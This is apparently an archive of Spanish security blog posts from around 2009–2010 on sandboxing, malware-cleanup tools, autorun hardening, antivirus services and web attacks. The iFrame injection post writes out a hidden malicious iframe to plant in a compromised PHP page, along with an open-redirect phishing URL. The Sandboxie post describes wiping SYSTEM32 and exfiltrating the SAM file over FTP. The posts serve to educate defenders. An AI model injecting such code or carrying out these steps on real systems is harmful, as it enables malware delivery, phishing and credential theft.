Sandboxie Cristalizada

Cuan niño en la playa, hace unos meses vimos que la solución de Sandboxie ofrecía una virtualización a la carta para cualquier problema o archivo que quisiéramos abrir en un entorno controlado. Lo cierto es que es una utilidad que te permite ejecutar esos anexos sospechosos de forma más o menos segura y sin necesidad de tirar de máquinas virtuales como Virtual PC, VMWare, etc. El modelo de Sandboxie es tan bueno que hay sistemas operativos como Qubes OS (del cual vuelvo a hablar, jeje) que se basan completamente en la virtualización de todo, Chromium OS (al cual estoy deseando echarle el guante) parece que también va a apostar por un fuerte aislamiento de procesos.

Y ya está, ya tenemos seguridad. Surfeemos por las olas más peligrosas de Internet con nuestro navegador en su cajita de arena bien tranquilos de que los tiburones de las vulnerabilidades, troyanos, etc. se llevarán un chasco al morder. ¡Error!, veamos de lo que nuestra cajita de arena es capaz de protegernos por defecto:

Levantar un servicio: Sandboxie es capaz de capturar todas las llamadas a rutinas del sistema, por tanto hace una cosa en la que se basa gran captidad de malware, “hookea” esas llamadas y las intercepta según estén permitidas o no. Por defecto no podremos levantar servicios:

Ejecutar una tarea programada: No nos servirá de nada, si recordáis existía un pequeño fallo que permitía programar una tarea con el comando “at” y que el proceso lanzado fuera con unos privilegios un tanto superiores, eso en una sandbox no pasará:

¡¡Escapar de la sandbox!! No, lo he intentado, pero no se puede. Podemos probar a lanzar un Word y a partir del explorador abrir cmd.exe, exploradores, etc. de la forma recursiva que queramos hasta hacer una lista de 40 o 100 subprocesos, da igual que sea la ejecución de un comando o el lanzamiento de un notepad, todo estará en la misma cajita de arena :-S

¡¡Destrozar la sandbox!! ¿Y si lanzamos una máquina virtual dentro de VmWare? No es mala idea, hay que ver al lanzar una máquina virtual con un sistema operativo propio tendrá sus propias llamadas al sistema, que no tendrán que ver con las del anfitrión, sin embargo sandboxie detecta que nos pasamos de tamaño y lanza un error:

Con lo que la máquina virtual no carga. Sin embargo no se porta tan bien si nos da por destrozar archivos, no hay nada como ejecutar un cmd.exe y lanzar un del *.* en SYSTEM y SYSTEM32, esos comandos se ejecutarán dentro de las limitaciones de todo usuario administrador, también podemos formatear otras unidades etc. Como la SANDBOX virtualiza todos los cambios en el sistema el archivo de "cambios", irá creciendo. Sin embargo se da la particularidad de que la propia SANDBOX tira de esos archivos virtuales para correr, por lo que si nos cargamos por ejemplo la librería de la imagen, sayonara SANDBOX.

Java Virtual Machine: Otra buena idea que no funciona, si lanzamos una aplicación Java cuando quiera interactuar con el sistema será capturada, también nos aparecerá entre almohadillas “#”

Entonces no hay de que preocuparse,,, ¡o si!

Todo cambio que un programa en su cajita de arena haga en el sistema quedará reflejado dentro de la cajita de arena, es decir siempre que entres en la sandbox estará conforme el último programa ejecutado lo haya dejado. Por ejemplo si renombras cmd.exe por Pepito.exe y magnify.exe por cmd.exe (aprovechando el fallo de la lupa de Windows que comentaban en Security by Default) siempre que estés virtualizado la lupa será el cmd, de ahí que se aconseje cambiar la arena al 3x2, como a los gatos.

Pero todo esto no quita lo más importante de todo, que todo programa dentro del sanboxie tiene la capacidad de leer del sistema. No solo eso, de lanzar los comandos y aplicaciones que el usuario tenga permisos, por lo tanto podrás leer el archivo SAM o cualquier otro que te interese de los “importantes del sistema” si ejecutas tu equipo como Administrador, también podrás lanzar un FTP para mandar esa información donde quieras:

Luego podemos hacer dos cosas, o utilizamos un usuario con privilegios mínimos (lo que reduce la necesidad de utilizar sandboxies) o configuramos de forma segura la sandboxie, deshabilitando el acceso a ciertas carpetas o la ejecución de programas.

Por otro lado Sandboxie como aplicación que hookea las llamadas al sistema no se lleva bien con determinados antivirus y drivers, que pueden permitir “fugas” de la caja de arena o bien incompatibiliza la ejecución de cierto software bajo su control, tenéis una lista aquí, hay algún caso llamativo como el antivirus de Mcaffee, etc.

En todo caso y en previsión de accesos no deseados o ejecución de terceras aplicaciones ocultas, etc. en la configuración de toda sandbox se puede hacer lo siguiente:

- Restringir el acceso a Internet (eliminarlo o reducirlo a las aplicaciones que querramos).

- Obligar a que ciertas aplicaciones se ejecuten siempre dentro de la sandbox, o que todo lo que venga desde una unidad externa (CD, DVD, USB, etc.) se abra en una sandbox.

- Restringir derechos de administrador, esta opción es la más importante, así se evitará el acceso a archivos de sistema.

- NO habilitar ninguna de las opciones para reducir la seguridad de la sandbox (cambiar contraseñas, etc.) a nivel software o hardware.

- Bloquear el acceso al registro del sistema así como a los recursos que no deseemos compartir con la humanidad.

- No añadir (salvo que sea imprescindible) la comunicación mediante servicios COM como excepción de seguridad, esto permitirá que un programa dentro de la sandbox pueda comunicarse con otro que está fuera.

- Deshabilitar el acceso en navegadores a cookies del sistema, así como a cualquier recurso fuera de la sandboxie.

- Deshabilitar la recuperación instantanea de recursos. Cuando querramos cambiar la arena al gato, perdón a la sandboxie, esta opción permite recuperar automáticamente los archivos creados, lo que puede permitir a un virus salir fuera de la cajita. Esta opción debería mejorarse, ya que se basa en listas negras cuando parece más lógico que sea por listas blancas.

Como véis una solución de virtualización también puede quedarse corta si no se configura adecuadamente, sería trivial extraer por ejemplo los servicios que se están ejecutando o copiar el archivo de SAM a un PC externo. Por lo tanto es importante restringir los derechos y asegurarnos de que no ejecutamos software incompatible mientras mejora el aislamiento de procesos en nuestros sistemas operativos, que parece que es la tónica a seguir a partir de ahora :-p

Y esto es todo por hoy,,, que no por este 2010, ¡vuelvo pronto!

Salu2

Sandboxie

Hoy presentamos una sencilla aplicación que hará las delicias de los muchas veces sufridos usuarios de máquinas virtuales. Una de las aplicaciones de estas últimas es disponer de un entorno “basura” en el que realizar nuestros experimentos, bajarnos esos archivos sospechosos o directamente analizar malware. Es probable que os pase como a mí, juntando fácilmente 4 o 5 de estas máquinas nuestro disco duro baja vertiginosamente, además se necesita mucha memoria RAM para que vayan decentemente ligeras.

Con SandBoxie se puede ahorrar bastante tiempo y recursos en maquinas virtuales, esta aplicación genera un entorno de virtual donde todo lo que se ejecute estará aislado del sistema operativo. Se integra en Windows perfectamente como una opción más del “botón derecho – click” y su complejidad es mínima:

Podemos trabajar con ficheros en un entorno virtual, darle los permisos que queramos sobre el entorno real, ubicar un espacio para almacenar aquellos archivos que querramos extraer de la cajita de arena, disponer de más de una sandbox, etc. Y todo esto de forma gratuita :)

Un detalle que me ha gustado es que no es trivial "salirse" de la sandbox, a pesar de que los procesos nuevos te aparezcan si haces un pslist lo que ellos generan está controlado y sus permisos restringidos. Por ejemplo, probad a ejecutar un cmd.exe en la sandbox y desde ahí un notepad, word, etc. No podréis grabarlos en la unidad física, casi casi como un appliance vmware. En la página de los autores hay un buen tutorial que os dejo por aquí , espero que os guste.

Happy Week!

Exploits of Death

You are a dead man.

Response: Sure, do you have an exploit of death?

La historia del hombre siempre parece que es cíclica, sucede con los mercados bursátiles y con las crisis económicas, sucede cuando olvidamos o no reflexionamos sobre los acontecimientos que nos atañen y, pasado un tiempo, volvemos a encontrarnos como estábamos. Reflexionando un poco parece como si entráramos en un bucle del que estamos “obligados” a tomar la decisión correcta y aprender de nuestros errores. Algo así como el día de la marmota o atrapado en el tiempo:

Supongo que estas cosas también ocurren en las cosas que el hombre crea, en un paralelismo un tanto retorcido ahí tenemos la vieja vulnerabilidad de el ping de la muerte que, a parte de tener un nombre cool, fue un fastidio durante bastante tiempo, en especial por que allá por la edad de piedra de la informática, año 1996, había muchas cosas y muy buenas, pero todavía no había Seguridad ni cultura y sensibilización sobre la misma.

13 años después me llega un correo de Hispasec donde enviando unos paquetes especialmente manipulados a un Windows Vista o Windows 7 que tengan el servicio SMB activo (en Vista, si no recuerdo mal por defecto), te tira la máquina provocando un BSOD ya que el driver que interpreta las cabeceras de los paquetes para ese protocolo trabaja en la “Zona Cero” del núcleo. Curiosamente lo han publicado “sin avisar” y actualmente es explotable (más info en el blog de Laurent Gaffié ) un viejo ataque (desbordamiento de buffer) para nuevos Sistemas Operativos, ¿cíclico? Lo dejo a opinión del lector. Lo que está claro es que los tiempos entonces no son los tiempos de ahora, la política de actualización de parches de Microsoft podrá ser mejor o peor, pero es constante y bajo periodos definidos, salvo excepciones claro. Y lo que es más importante de todo, atosiga al usuario con avisos para que actualice. Bajo ese escenario empresas y usuarios domésticos pueden estar algo más tranquilos que allá por el 96.

Por cierto, en el 2004 salió otro de esos exploits con nombre cool, se llamaba JPEG of Death y Microsoft tardó varias semanas en publicar parche, sin embargo y curiosamente a día de hoy me he encontrado con muchos antivirus que no detectan los exploits disponibles en milw0rm. Eso si, será difícil encontrar una víctima sin actualizar.

¿Cuándo se volverá a repetir la historia?

Salu2

Firefox Tunning: Top 10 plug-ins

Debates acerca de qué navegador Web es mejor hay casi todos los días, estadísticas sobre cual es más seguro también. Están aquellos que no salen de Internet Explorer, los amantes de Firefox, empieza a surgir un grupo numeroso (entre el que me encuentro) que les gusta la agilidad y rapidez del Chrome, los applemaniacos tienen su Safari, etc. Etc. Independientemente de cual utilices estarás conmigo en que hay uno de todos ellos que destaca por la cantidad ingente de complementos y plug-in de que dispone: Firefox.

De aquí surge la idea, ¿puede ser un navegador una buena herramienta de trabajo en nuestras auditorias? Por supuesto que si, es casi indispensable. Ahora bien, ¿puede agilizarnos el trabajo? También.

He hecho una pequeña lista con los 10 plug-ins más interesantes para hacer Firefox tunning, evidentemente no estaréis de acuerdo con algunos de ellos y otros los desconoceréis, de igual forma si conocéis alguno que puede venir bien, animaros a comentad :-)

1.- User Agent Switcher à Indispensable si quieres cambiar la forma en la que te presentas a los servidores web.

2.- Foxy Proxy à Muy útil para cambiar de proxy de forma ágil, si utilizáis herramientas como Paros es indispensable.

3.- FireGPG à Utilidad para incorporar cifrado y autenticación PGP a nuestro correo electrónico, lobosoft ya nos hablo de él cuando vimos el PGP Desktop.

4.- Secure Password Generator (Firefox 3.0) à Sencilla utilidad para generar nuestras password de forma robusta.

5.- Ghostery 1.5.1 à Este fantasmita se nos incorporará en la barra de tareas avisándonos cuando el sitio que visitemos intenta recuperar información “adicional” de nosotros. Muy util para proteger nuestra privacidad.

6.- Dr.Web anti-virus link checker 1.0.20 à Y que tal si en vez de bajarnos algo y pasarle el antivirus, lo hacemos “antes” de que ya esté en nuestro equipo, o de otra forma, antes de visitar una pagina web y cargarla, ¿por qué no revisamos el enlace? Dr.Web lo hace por nosotros.

7.- Access Me à Esta herramienta y las dos siguientes forman parte de un pack de auditoria web donde se tratará de acceder a links ocultos, hacer SQL injection en su forma básica y XSS, genera sus propios informes y todo :) proporcionado por Security Compass.

8.- SQL Inject-Me

9.- Exploit-Me

10.- Web Of Trust à Incorpora a tus busquedas en google, bint, etc. un indicador con la confianza que puedes tener al visitar un sitio web.

10 + 1.- Panic Button 1.1.2!! (este ya sabeis para que vale).

Es posible que al final os junteis con un monton de complementos y al final os salgan unas barras minimo como esta, pero a buen seguro ganareis en seguridad y agilidad :-)

Salu2!

*Nota del autor: Un link más completo de Firefox Tunning, lo teneis aquí: http://www.security-database.com/toolswatch/Turning-Firefox-to-an-Ethical.html hay algunos que ya los señalaba yo, y otras que efectivamente se echan de menos, habrá que subir de Top 10 a Top 30 :-)

iFrame Injection

Journalist: Do you think that something like Skynet is possible in the future?

Security Consultant: While just one Security Consultat keep breathing, that won’t happen.

Una cosa que siempre me ha causado cierta admiración es la habilidad e imaginación que las mentes de los “hackers” son capaces de desarrollar a la hora de generar sus ataques. Es una curiosa mezcla entre una gran conocimiento metodológico y sistemático de unos sistemas diseñados por el hombre sobre una base matemática y algebraica que a su vez requiere de gran creatividad e imaginación para obtener nuevas puertas, vulnerabilidades, brechas o como quieras llamarlo sobre sistemas que ya otras muchas personas se estuvieron comiendo la cabeza antes como diseñar. Recuerda un poquito a una partida de ajedrez, los movimientos son conocidos y limitados, pero las posibilidades casi infinitas (como la paradoja del grano de arroz y el tablero de ajedrez).

Esta mañana revisaba un paper con los principales vectores de ataque que el cybercrimen está utilizando en esta primera mitad del 2009, entre los que destacan estos 5:

- SQL Injection

- iFrame Injection

- Encryption Wrappers (malware)

- File Masquerading (algo que ya vimos en el Rosillo Project)

- Encryption techniques in peer to peer systems for bypass web gateways inspection systems.

El documento hace referencia a como los chicos malos utilizan tecnología tan interesante como el Grid Computing para lograr una cantidad ingente de recursos a su disposición (son las conocidas como botnets) y utilizar a su antojo. Independientemente de la opinión que os merezcan estos 5 vectores hay uno del cual llevaba sin escuchar mucho tiempo, es el iFrame Injection.

iFrame Injection

Hagamos un poquito de literatura, un iFrame o “marco incorporado” (que mal suena) es un trozito de codigo HTML que permitirá incrustar un objeto html dentro de una pagina html. Esto puede tener muchas utilidades, entre ellas la publicidad, pero alguien no tardó mucho tiempo en aprovecharse de estos “marcos” con fines delictivos. Todos recordamos esa oleada de correos que en los años 2002-2004 no había siquiera que abrir, ya que incluían código maligno que ejecutaba el gusano anexo del correo que a su vez aprovechaba una vulnerabilidad del Explorer para hacer su trabajo. Toda una interesante vuelta para llegar al objetivo de siempre: comprometer un sistema. Original, ¿verdad?

La idea se ha reciclado un poquito y vuelve a la carga, la definición que se da en el paper es la siguiente:

"iFrame injections can be as small as 1x1 white píxel at the bottom of a web page uncen by the visitor and linked to active scripts that download malware from an obscure Server"

Según Symantec cada dia unas 3000 páginas web son infectadas, algunas de ellas mediante esta técnica que bien podría utilizarse también para hacer phishing, ¿cómo? Supongamos que logro comprometer un servidor web desarrollado en ,,, digamos php (por poner un ejemplo). Supongamos que inyecto en el archivo index.php (los iFrames no son exclusivos del código HTML) el siguiente código maligno:

iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

Como se puede apreciar el atributo de visibilidad está en “oculto”, con lo cual no se mostrará en pantalla, sin embargo se ejecutará. Lo cual cargará una pagina web maligna dentro de “la buena”. Si el sitio ya ha sido catalogado por google como “maligno” es muy probable que nos salte un disclaimer como el siguiente:

Que a su vez nos permitirá ejecutar el “Safebrowsing” de google, quien nos informará del estado de esa Web en los últimos 90 dias, por ejemplo si queremos ver el número de infecciones del Marca nos dirá:

Por lo que podremos ver mañana la victoria de España a EE.UU. con tranquilidad (esperemos). Un consejo, consultad vuestra entidad bancaria, hay alguna sorpresilla.

Esto como suponeis puede ser una pesadilla para un administrador web que tiene que recorrer todas las páginas comprometidas buscando una cadena de texto y eliminándola / reparándola, a veces son cosas tan sencillas como sustituir una referencia por otra:

https://www.victim.foo/index.php?targeturl=http://fake_victim.foo/login.php

Se puede incluso complicar la detección de estas URL para que pase totalmente desapercibida valiéndonos de alguna de las técnicas de “Proxy Jocking” que vimos hace poco, haciéndonos pensar que todo está bien cuando no es así.

Info adicional:

Cleaning iFrame Injections

Frame Injection Fun

Clean.PHP (encuentra patrones conocidos en tu sitio web)

Web Legales en Jaque (Panda - WhitePaper)

Como veis, "nuevas" amenazas para viejos vectores de ataque.

Salu2!

Phish or No Phish, It's the Question

Con la ola de calor que estamos sufriendo no hay nada como irse al rio un poquito de pesca. Sacar la caña meter los pies en el agua y esperar que pique alguien o algo :-p

En esas estaba cuando me he encontrado este curioso sitio de Verisign con un pequeño test para ver lo bien que eres capaz de diferenciar los sitios reales de los fraudulentos. Una vez más he podido comprobar la retórica de "Todo es seguro", fallé una pregunta :-(

¿Y vosotros, habeis hecho pleno al 15?

Salu2!

PD: Como corolario por si quereis refrescaros más os dejo aquí el enlace al informe de Symantec de phishing 2009 (Abril), España no goza de gran protagonismo en este escenario, USA como siempre en cabeza:

Curiosidad adicional, ¿falta un 30% de mundo o está tan bien distribuido entre los paises en blanco?

RootKit Hunter

Lo reconozco, me resulta muy cómodo trabajar desde Windows, tanto es así que tengo que obligarme cada cierto tiempo a hacer cositas en Linux para no olvidar "la otra forma" de hacer las cosas, mucho más cercana al Sistema Operativo y que nos recuerda conceptos que con los años van quedando semi-enterrados.

A raíz de unos informes sobre configuración segura de Red Hat con los que tuve que colaborar recientemente me volvió la eterna pregunta, ¿qué hacemos con el malware en Linux?, la creencia popular es que en Linux no hay virus, aunque si hay algo de lo que no podemos vivir los Consultores es de la "vox populi", todavía recuerdo el artículo de Kriptopolis donde hablaban de la creación de un virus en 5 pasos... , asi que decidí indagar herramientas antimalware que puedan ser interesantes.

Con todo este previo me encontré el Rootkit Hunter, repasemos, ¿qué es un rootkit?, tirando de wikipedia os diré que: "Un rootkit es una herramienta, o un grupo de ellas que tiene como finalidad esconderse a sí misma y esconder otros programas, procesos, archivos, directorios, claves de registro, y puertos que permiten al intruso mantener el acceso a un sistema para remotamente comandar acciones o extraer información sensible, a menudo con fines maliciosos o destructivos" en palabras más llanas aún, es un, vamos a entrar en tu caja fuerte y encima nos vamos a asegurar que sigamos entrando cuando querramos sin que te enteres.

Hmmm, de esto si que tenemos en Linux, y mucho, pues bien este programita de sencilla utilización nos ayudará a detectarlos y asegurarnos que el sistema no ha sido comprometido, no tiene una backdoor oculta y no hay ninguna herramienta en la penumbra con intenciones de aparecer cuando no hay nadie mirando, ¿interesante, verdad?

Rootkit Hunter ya corre por su versión 1.3.4 puede descargarse desde aquí aunque si sois más comodos podeis acudir al legendario: apt-get install rkhunter con lo que se descargará e instalará con las opciones por defecto, otra forma es hacerlo así:

Lo normal es que tras la descarga dispongamos de la versión actualizada aunque con un "rkhunter --update" nos aseguramos, después solo basta un "rkhunter --check" para comprobar nuestro sistema (todo ello como root, claro):

En este caso salvando varios warnings parece que me he escapado de los más de 100 rootkits que detecta (entre otras cosas), aunque es normal, arranco desde Ubuntu una vez cada 15 dias, sobretodo ahora que le estoy dando caña a la RC de Windows 7, de la cual espero que hablemos otro día.

Buena semana a todos y, buena caza :)

Secure Process (Windows)

Red cable give us power, the black one is earth, these two look led’s cables and i don’t know about the yellow one, just remember it from the sham...

Response: Cut up the yellow!

Los procesos, esas extrañas cositas que están siempre corriendo desde el momento que nuestro sistema operativo se carga en memoria. Llenos de instrucciones, en ejecución, en espera, procesos zombie y procesos suspendidos por un examen que nunca hicieron. Ahora en serio, todos recordamos los apuntes de Sistemas Operativos, estamos familiarizados con el Ctrl + Alt + Sup o de algo nos suena el comando “ps” pero, ¿qué narices están haciendo nuestros procesos?, ¿cómo sabemos si están ocultos?, ¿qué librerías están utilizando?, ¿quién los puso ahí?

Probablemente alguna vez os hayais preguntado, ¿por qué la CPU no baja del 80%?, ¿Quién está consumiendo todos los recursos y por qué? Hoy os voy a presentar un par de herramientas que nos sacarán de dudas. La primera es el Security Task Manager que detrás de sus colores fosforito (cuando arranca) te muestra todos los procesos que corren en el sistema, tanto ocultos como visibles, quien es el fabricante, path en el disco duro y un ratio de riesgo que calcula la probabilidad de que sea malware, para mayor seguridad se integra con virustotal y si estamos seguros podemos poner el ratio nosotros mismos (por ejemplo ante herramientas de seguridad que conocemos y hemos instalado):

Una utilidad interesante que incluye es la de poner procesos en cuarentena o directamente desinstalar la aplicación que inició ese proceso:

Pero esto no es todo, todavía existe un proceso misterioso, usa antifaz y se oculta bajo la oscuridad,,, es el,,,, ¡svchost.exe! Todos lo hemos visto pero nadie sabe de donde viene ni a donde va, los virus aprovechan para ocultarse en sus entrañas y algunos incautos deciden cargárselo directamente, normalmente con malas consecuencias. Por suerte disponemos de la utilidad de enrevesado nombre conocida como Svchost Analyzer.

Igual que el Task Manager, nos advertirá sobre lo que considere no debería estar ahí, o al menos es de comportamiento extraño.

Y si con todo esto seguís sin ubicar vuestros procesos, podéis ayudaros con:

http://www.procesoswindows.com/

http://www.what-is-exe.com/

Salu2!

Seguridad Coste 0: Autorun Vs Confincker

No todas las medidas de seguridad son caras, de hecho la mayor parte de ellas son más que asequibles. Como consultores de seguridad vivimos en un constante ciclo de Deming, el conocido Plan-Do-Check-Act, indispensable si nos creemos aquello de “la seguridad es un proceso” o sabemos algo de la ISO 27001 o de ITIL. Dentro del Check detectaremos las cosas que no están funcionando, o aquellas donde es necesario transformar el nivel de riesgo, para ello debemos ser partícipes de los procesos de negocio de nuestra empresa ponderándolos con los riesgos actuales y futuros, informando del estado actual y futuro de sus sistemas. El negocio nunca quiere asumir excesivo riesgo, a no ser que genere mayores oportunidades de negocio (esto es una curiosa paradoja), y tampoco quiere gastar dinero en más seguridad, quiere tener mejor seguridad.

Medidas de seguridad gratuitas y de bajo impacto son las que siempre nos reclamarán, esto muchas veces parece imposible, hace falta inversión, pero otras podemos quitarnos de una tacada un porcentaje alto de riesgos con una mínima cultura de la seguridad, o simplemente estando al día de las amenazas. Si habéis leído el Informe Mcaffe sobre amenazas del primer trimestre de este año) os encontrareis con apartados curiosos como “la exageración del Confincker frente a la realidad del autorun”, con gráficas como la siguiente donde se compara la aparición de gusanos que explotan el autorun de Windows  con el gusano Confincker:

Después de ver cosas así a uno le viene el regustillo de aquellos virus que se transmitían por disquetes y esos antivirus imposibles de actualizar cuando no se disponía de Internet. La in-seguridad, como la moda, siempre se repite. El caso es que la medida para mitigar este tipo de amenazas “nuevas”, aparte de tener antivirus actualizado (se da por supuestísimo) pueden pasar por una sencilla desactivación del autorun. Esto es un inicio à ejecutar à gpedit.msc (edición de las directivas de seguridad de grupo), Sistema y veremos la siguiente ventanita:

Con ello tendremos la falsa sensación de seguridad de que nuestros gusanos autorun no se ejecutarán, craso error. Basta un doble click sobre la unidad extraíble para que se ejecute, por lo que habrá que eliminarlo del registro con Inicio à Ejecutar à regedit y

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2

Donde configurando los permisos de la clave tendremos:

Y ahora ya tendremos la certeza de que el autorun no nos dará quebraderos de cabeza, esta medida aplicada a todo el parqué de microinformatica en una empresa, ¿Cuántas infecciones evitará?

Ah, y si queréis hacerlo de forma más cómoda tenéis las “Power Toys” disponibles aquí:

Y si teneis Vista un buen artículo de Microsoft aquí. A “nuevas” amenazas, “nuevas” soluciones, todo entre comillas xD

Salu2

Esmeralda, lectores. Lectores, Esmeralda.

Se acerca el fin de semana, ¿no tenéis plan?, ¿estáis aburridos?, vamos, tiene que haber algo que se pueda hacer… ¡espera!, ¡se me ocurre una idea!, os voy a presentar a una amiga mía. Sé que vosotros no sois de esos que les gusta ligar por internet, el método tradicional es siempre más bonito, pero oye, yo os la presento y ya me contáis, ¿vale? Solo tenéis que agregar esmeralda@virustotal.com a vuestro Messenger y podréis verla:

Parece de buena familia :-p

 Hmm, ¿a que es guapa?, encima habla inglés a la perfección, puede mantener una conversación “animada” y entiende un poquito de virus, hashes y cosas malignas varias. ¿Ah, que no queréis mezclar trabajo y Amor? Bueno, ella trabaja en Hispasec, no creo que os crucéis pero oye también le puedes hablar de comida, deportes, etc. En fin, una chica maja, sobretodo cuando le pregunté si le sonaba de algo un hash y me dijo que virus era,  ¿cómo? Pues muy sencillo:

  - ¡hash código_hash (SHA1 – MD5 – SHA256)

        - ¡url  url_paginaweb

¡Conocía el Eicar Test File!, ¿Sabrá cocinar?

Bueno, pues ya tenéis plan para este finde ;-P Si no me preocupo de vosotros,, a ver quien lo hace.

Salu2!!

PD: Si, los chicos de Hispasec se lo pasan muy muy bien en el trabajo :D

PD2: El método tradicional:

Cloud Virus (Anti)

No se lo que te pasa, estás siempre en las nubes...

Respuesta: Claro hombre, es lo que se lleva ahora.

El principal beneficio del cloud computing, o “computación en nube” que tanto se está escuchando últimamente, es el ahorro de costes. Parece que la tendencia actual pasa por disponer de terminales “tontos” y dejar toda la potencia de cálculo en grandes servidores, de tal forma que las empresas puedan ahorrar en microinformática y centralizar los servicios necesarios para el trabajo del día a día al mínimo coste.

Un sencillo ejemplo de cloud computing son las Google Apps, aunque quizás sería un poco difícil de integrarlas en las Normativas y Políticas de seguridad de cualquier empresa considerable (aunque prometen cumplimiento GLB, HIPPA, etc.).  Volviendo a nuestra computación en red, los antivirus parece que poco a poco también comienzan su andadura sobre este “nuevo” modelo de arquitectura. Como sabéis los antivirus se basan principalmente en firmas, es decir saben que cuando un proceso ejecuta cierta combinación de instrucciones, ahí puede existir un virus. Saben que cuando un archivo dispone de cierto hash, también puede estar infectado. También es verdad que actualmente también disponen de heurísticas que “aprenden” y detectan comportamientos clasificados como sospechosos, una escalada de privilegios, el borrado o manipulación de archivos de sistema, etc. En todo caso parece un patrón de trabajo orientado a “Listas negras”, del estilo, no me gusta tu aspecto o a ti ya te vi la otra noche y me armaste trifulca, mejor quédate en tu casa porque aquí no entrarás hoy. Claro está existen antivirus que se basan exactamente en lo contrario, “Listas blancas”, es decir, sólo aquellos que yo conozco y confío en ellos podrán ser ejecutados. Si bien ambos modelos son acertados, ninguno de ellos es válido por si solo, la correcta mezcla de ambos es la que nos proporciona antivirus eficaces.

¿Cómo integrar los antivirus en el cloud computing? Existen numerosas alternativas, por ejemplo en Panda se han decantado por aprovechar la nube para utilizar cada antivirus como un “sensor en la nube”, así todas las nuevas muestras de malware, o sospechosas de serlo son enviadas a un repositorio centralizado que compara con sus bases de datos de software maligno, compara con sus listas blancas y gracias a un sistema inteligente calcula la probabilidad de que sea nuevo malware, o no.

Otra alternativa mucho más sencilla (y económica) que sirve como “juguete” antivirus en la nube es el “Cloud Antivirus”, esta aplicación se integra en nuestro Windows XP / Vista siendo muy sencilla de utilizar:

Calcula el hash SHA-1 del archivo enviándolo a un servicio habilitado por el TEAM CYMRU(yo tampoco había oido hablar de ellos), comparan el hash con una base de datos de malware de que disponen, y te muestra el resultado del análisis:

Está en versión BETA y puede ser un complemento interesante al antivirus tradicional. No obstante todavía no funciona muy bien, se ha tragado el Poison IVY sin realizar ninguna manipulación adicional :-(

Y esto es todo por hoy.

Salu2!

PD: Cumplimos 100 entradas juntos :-) en la siguiente toca chiste ;-D

Forensic Tool Kit

Tranquilos niños, encontraremos vuestros datos sanos y salvos.

Respuesta: Ponte los guantes Jimmy, vamos a manipular cadáveres.

Siendo cierto que los Reyes Magos ya pasaron, dejando regalos, betas de Windows 7 y carbón a diestro y siniestro, hoy quiero presentaros un juguetito pensado para intervenir cuando los que no se portan bien hacen de las suyas. El mismo es un kit de análisis forense que permite a nuestros Sherlock Holmes presentarse en la escena del crimen y comenzar a recolectar evidencias que integradas en nuestra “cadena de custodia” y siguiendo los respectivos procedimientos de etiquetado, clasificación, duplicado, etc. pueden ser analizadas en nuestro laboratorio forense.  

Desde luego el carácter de esta herramienta no viene orientado a clientes que simplemente desean saber que sucedió para corregirse y que no vuelva a ocurrir, sino que parece más ideada para escenas donde hay una investigación judicial por detrás o se quiere llegar realmente hasta el fondo de los hechos.  El juguete permite copiar bit a bit desde todo tipo de dispositivos USB, IDE, PCMCIA, tarjetas Flash, etc. a un ratio de ¡wooooo! 6 GB por segundo, algo que ya quisiera para mi disco duro :-D 

Como no puede ser de otra forma permite hacer un hash con MD5 o SHA-256 de las imágenes obtenidas (¡preservando integridad!), además incluye software que facilita el trabajo buscando números de teléfono, nombres, direcciones, passwords y mostrándolas automáticamente en productos como enCase. Si habeis pensado en buscar un enchufe tampoco os hará falta, ya que incluye su propio sistema de alimentación además si lo adquieres con el maletín de protección  no tendrás que preocuparte de caídas, pulsos electromagnéticos, ataques bacteriológicos (bueno esto quizás no), etc.

En fin, habrá que portarse bien, ¡tenemos todavía mucho año por delante!

Salu2!

De Virus y Ordenadores Domésticos Seguros

En estas fechas tan señaladas quien más quien menos se toma unos días de descanso. En eso me encontraba yo cuando me llamaron por un ordenador “maligno” que se había vuelto hostil hacia su dueño. Rápidamente me presenté en la escena del crimen, donde un año atrás había dejado un XP SP2 con el Spyboot, el Firewall activado y los programas justos para no encontrarme sorpresas.

El panorama fue desolador, no era posible ni pasar de la pantalla de login, al teclear el usuario y la pass directamente te mostraba la ventanita de salir de Windows (¿??¿). Los modos a prueba de fallos y símbolo de sistema tampoco funcionaban (¿?). No quedaba más remedio que acudir al rescate por medio de un live! CD o un USB autoarrancable, aquí como siempre nuestro amigo el Hiren’s Boot nos puede echar una mano.

Identifiqué entre otros a los:

• Win32: Adware-gen [adw]
•  Win32: Downloader-ZT [TRJ]
• Win32: Fraudav
• Win32: Spyware-gen [TRJ]
  
• Win32: WinFixer [TRJ]
  
• Etc.

Replicados hasta 32 veces. Se me cayó la cara al suelo, en 1 año rara vez recibo / detecto más de 2 – 3 virus, supongo que el tener todo actualizado gracias a programas como Secunia PSI, sospechar cuando recibo correos invitándome a espiar a mis contactos del msn, utilizar Windows Vista SP1 en lugar XP SP2-SP3 o mantener un antivirus gratuito actualizado es demasiada Sensibilización y roza la paranoia (de trabajar sin ser administrador, mejor no hablamos).

Es más fácil pensar que Windows = Caca, que Linux es lo mejor (solo para frikys claro) y que es obligatorio formatear 1 vez al año. Mientras tanto, ¿a quién le interesan nuestros datos?, ¿Qué van a querer de mi?, pues nos lo contó Symantec a principios de año, decía que depende, pero una cantidad con la que nos podíamos pagar las copas esta nochevieja:

Pero ya sabeis que los mismos que hacen los virus son los que venden antivirus, y que no existen mafias en Internet, etc. Somos nosotros los alarmistas, que hay que garantizarse el empleo y sueldo en 2009 ;-).

Salu2!

Pupurri

Varios apuntes rápidos:

1) En FIST colgaron hace unos días las presentaciones de las conferencias que vimos, son las siguientes:

• Análisis de Riesgos en ISM3-RA.
• Análisis Forense en Memoria RAM.
• Cryptool, Criptografía para masas.

2) En Panda Labs han hecho un curioso gráfico que explica la relación malware - mercado negro, recordándonos que esto es algo más que una peli de Indios - Vaqueros:

3) Finalmente, y para despedirnos con una sonrisa, me encuentro esto en el blog de f-secure.

Lo dicho, There's no place like 127.0.0.1

Salu2!

Virus Total

Happy Monday!!

Comencemos la semana con una web de “Favourite List”, no es ningún descubrimiento pero siempre bien recordarla (para algunos) o explicarla (para otros). Se llama www.virustotal.com y como su nombre parece indicar es un antivirus online, pero no el típico antivirus, sino una web que incorpora los motores de busqueda de los principales fabricantes de antivirus del mercado, vamos una barbaridad, son todos los siguientes:

• AhnLab (V3)
• Aladdin (eSafe)
• ALWIL (Avast! Antivirus)
• Authentium (Command Antivirus)
• AVG Technologies (AVG)
• Avira (AntiVir)
